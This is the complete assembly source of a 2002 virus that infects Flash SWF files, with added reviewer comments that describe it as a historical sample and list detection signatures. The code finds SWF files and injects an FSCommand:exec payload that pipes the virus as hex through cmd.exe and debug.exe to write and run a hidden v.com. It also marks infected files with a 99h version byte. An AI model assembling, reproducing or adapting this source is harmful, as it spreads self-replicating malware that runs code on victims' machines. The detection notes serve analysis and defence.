; ------------------ 
; Description: WinNT/XP Virus dropper for Flash .SWF files!
; Masm Version 6.11: ML.EXE SWF.ASM 
; Virus Size: 926 bytes 
; Infection Size: 3247 bytes. 
; Last Edit: 01/08/2002 


; --------------------------------- Begin Source Code ------------------------------------ 
; NOTE(review): historical 16-bit DOS sample, kept here for analysis. Defender summary of
; what the visible code establishes (nothing beyond these lines is assumed):
;   - Targets: *.SWF files in the current directory, enumerated with INT 21h
;     FindFirst/FindNext (AH=4Eh/4Fh).
;   - Infection marker: the SWF version byte (file offset 3, VERSION_NUM below) is
;     overwritten with 99h; files already carrying 99h are skipped. That byte doubles
;     as a scan signature for modified files.
;   - Inserted content: a DoAction tag placed directly after the SWF header whose text
;     starts with "FSCommand:exec" and names cmd.exe and debug.exe; the file it writes
;     out is "v.com", which is then given the hidden attribute (AX=4301h, CX=2).
;   - Preconditions it relies on: a real-mode DOS INT 21h environment, DEBUG.EXE being
;     available, and a Flash player that honours FSCommand exec. On systems where any of
;     these is absent the observable effect is limited to the on-disk SWF modification.
; Detection points: 99h at SWF offset 3; "FSCommand:exec" followed by "cmd.exe"/"debug.exe"
; text inside a DoAction tag; a hidden v.com alongside SWF files.
.286
.model tiny
.code
org 100h

Entry: jmp Start

VIR_SIZE equ Virus_End-Entry

DTA db 128 dup(0) ; Offset DTA+30 = filename
HANDLE dw ? ; Handle to host file
PTR1 dd 0 ; Segment address of the created memory block
PATH db *.SWF ,0 ; File mask
BINARY db v.com ,0 ; Binary code (name of the dropped file; set hidden in ExProg)
HEX db 0123456789ABCDEF ; Binary to hex

; Flash header block.
; -------------------
; Layout mirrors the first bytes of an SWF file: "FWS", version, 4-byte length.
SIGN_FW dw ? ; SWF file format
SIGN_S db ?
VERSION_NUM db ? ; File offset 3; 99h here is the infection marker (see Infect)
FILE_LENGTH dw ?
dw ?
STATIC_HDR_SIZE equ $-SIGN_FW

RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isn't static. ;(
RECT_BUF_SIZE equ $-RECT_BUF

HDR_SIZE dw ? ; Holds the true header size!

; Start of Viral Frame 0.
; -----------------------
; The text below is what ends up inside the host SWF; it is the most stable
; content-based indicator this sample leaves.
DROP_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes!
TAG_LENGTH dw 0 ; (ACTION LENGTH+3)+1[END_TAG]
dw 0
db 083h ; ActionGetUrl Tag
ACTION_LENGTH dw 0 ; (DROP_BEGIN_SIZE-9)+(SUM OF DROP_MIDDLE)+(DROP_END_SIZE)
db "FSCommand:exec"
db 000h
db "cmd.exe"
db 009h ; chr(9) is Flash code for a space character.
db "/c"
db 009h
db "echo"
db 009h
db "Loading.Flash.Movie..."
db "&"
db "(echo"
db 009h
db "n"
db 009h
db "v.com&echo"
db 009h
db "a"
db 009h
db "100&"
DROP_BEGIN_SIZE equ $-DROP_BEGIN

DROP_MIDDLE db "echo"
db 009h
db "db"
db 009h
db 71 dup(",") ; db XX,...,XX where XX's are viral hex codes.
db "&"
DROP_MIDDLE_SIZE equ $-DROP_MIDDLE

DROP_END db "&echo.&echo"
db 009h
db "rcx&echo"
db 009h
db "39E" ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes.
db "&echo"
db 009h
db "w&echo"
db 009h
db "q)|debug.exe>nul&start"
db 009h
db "/b"
db 009h
db "v.com"
db 000h ; StringEnd Tag
DROP_END_SIZE equ $-DROP_END

; End of Viral Frame 0.
; ---------------------
END_TAG db 001h ; Action code 0x01 = tagshowframe Tag

Start:
mov ax,(VIR_SIZE+0fh)
shr ax,4
shl ax,1
mov bx,ax ; Allocate (VirusSize*2)
mov ah,4ah
int 21h ; Resize block
jc ExProg

mov dx,offset DTA ; Set DTA operation
mov ah,1ah
int 21h

mov cx,07h
mov dx,offset PATH
mov ah,4eh ; FindFirst
int 21h
jc ExProg
jmp Infect
Cycle:
mov dx,offset PATH
mov ah,4fh ; FindNext
int 21h
jc ExProg
jmp Infect
ExProg:
mov ax,4301h ; Hide v.com — sets the hidden attribute on the dropped file (on-disk artifact)
mov cx,02h
mov dx,offset BINARY
int 21h

mov ax,4c00h ; End program
int 21h
Infect:
mov byte ptr DTA[30+12],"$"
mov dx,offset (DTA+30)

mov ax,3d02h ; Open host file
int 21h
jc ExProg

mov [HANDLE],ax ; Save file handle

mov ax,3f00h ; Read file Header
mov dx,offset SIGN_FW
mov bx,[HANDLE]
mov cx,(STATIC_HDR_SIZE+RECT_BUF_SIZE)
int 21h
jc ExProg

cmp word ptr SIGN_FW,"WF" ; Check for a valid Flash SWF file ("FWS" signature on disk).
jne Cycle ; Try another file ...
cmp byte ptr SIGN_S,"S"
jne Cycle
cmp byte ptr VERSION_NUM,099h ; Already infected? (99h in the version byte is the marker)
je Cycle

mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag.
xor di,di ; Seems to always exist directly after the header.
next: cmp byte ptr RECT_BUF[di],043h
jne not_found
cmp byte ptr RECT_BUF[di+1],002h
jne not_found
jmp found
not_found:
inc di
loop next
jmp Cycle
found:
mov word ptr HDR_SIZE,STATIC_HDR_SIZE
add word ptr HDR_SIZE,di ; Compute the header size

mov ax,4200h ; Reset file ptr right after Flash header
xor cx,cx
mov dx,[HDR_SIZE]
int 21h
jc ExProg

push bx
mov ax,word ptr FILE_LENGTH
add ax,15
shr ax,4
mov bx,ax
mov ah,48h ; Allocate memory for target host file
int 21h
pop bx
jc ExProg
mov word ptr PTR1[2],ax ; Save pointer to allocated block

mov cx,word ptr FILE_LENGTH
sub cx,[HDR_SIZE]
mov ah,3fh ; Read host file into memory block
push ds
lds dx,[PTR1]
int 21h
pop ds
jc ExProg

mov ax,4200h ; Reset file ptr to the middle code section
xor cx,cx
mov dx,[HDR_SIZE]
add dx,DROP_BEGIN_SIZE
int 21h
jc ExProg

;
; The following code is a key technique. It simply converts the
; virus from binary to hex characters and then inserts them into the host
; using a standard format that DEBUG.EXE expects! Flash only really
; allows plain text, so this satisfies that condition.
;
; Review note: because the body is stored as printable hex inside the SWF,
; the infected file remains text-searchable; the surrounding "echo"/"db"
; lines are a usable content signature.

mov word ptr ACTION_LENGTH,(DROP_BEGIN_SIZE-9+DROP_END_SIZE)
push bx
mov cx,VIR_SIZE
xor si,si
xor di,di
ToHex:
mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex number
mov al,byte ptr Entry[si]
mov ah,al
and al,00001111y
xlat
mov DROP_MIDDLE[STATIC_HDR_SIZE+di+1],al
shr ax,12
xlat
mov DROP_MIDDLE[STATIC_HDR_SIZE+di],al
inc si
inc di
inc di
inc di
mov ax,si
mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line.
div bl
or ah,ah
jnz cont
push cx
xor di,di
add word ptr ACTION_LENGTH,DROP_MIDDLE_SIZE
mov bx,[HANDLE] ; Write hex dump entry XX,...,XX
mov dx,offset DROP_MIDDLE
mov cx,DROP_MIDDLE_SIZE
mov ax,4000h
int 21h
jc ExProg
pop cx
cont:
loop ToHex
pop bx

or di,di
jz no_remainder

mov dx,offset DROP_MIDDLE
mov cx,di
add cx,7 ; STATIC_HDR_SIZE-1
add word ptr ACTION_LENGTH,cx
mov ax,4000h ; Write remainder hex dump entry XX,...,XX
int 21h
jc ExProg

no_remainder:
mov dx,offset DROP_END
mov cx,DROP_END_SIZE+1
mov ax,4000h ; Write end code and end of frame tag(01) into host
int 21h
jc ExProg

mov cx,word ptr FILE_LENGTH
sub cx,[HDR_SIZE]
mov ax,4000h ; Write host code directly after viral code.
push ds
lds dx,[PTR1]
int 21h
pop ds
jc ExProg
; Patch the header with new viral values.
mov cx,word ptr ACTION_LENGTH
add cx,4
mov word ptr TAG_LENGTH,cx
add cx,6
add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH+6)
; Set infection marker (the 99h version byte checked above)
mov byte ptr VERSION_NUM,099h

mov di,[HDR_SIZE]
inc word ptr [SIGN_FW+di-2] ; Increase Frame count by 1 (header frame count no longer matches the original movie)

mov ax,4200h ; Re-wind to start of file
xor cx,cx
xor dx,dx
int 21h
jc ExProg

mov dx,offset SIGN_FW
mov cx,[HDR_SIZE]
mov ax,4000h ; Write updated viral header
int 21h
jc ExProg

mov dx,offset DROP_BEGIN
mov cx,DROP_BEGIN_SIZE
mov ax,4000h ; Write begin code into host
int 21h
jc ExProg

mov ah,49h ; Free memory block
mov es,word ptr PTR1[2]
int 21h
jc ExProg

mov ax,3e00h ; Close file
int 21h
jc ExProg

jmp Cycle ; DONE! Try to infect another.

Virus_End:
end Entry
; --------------------------------- End Source Code ------------------ 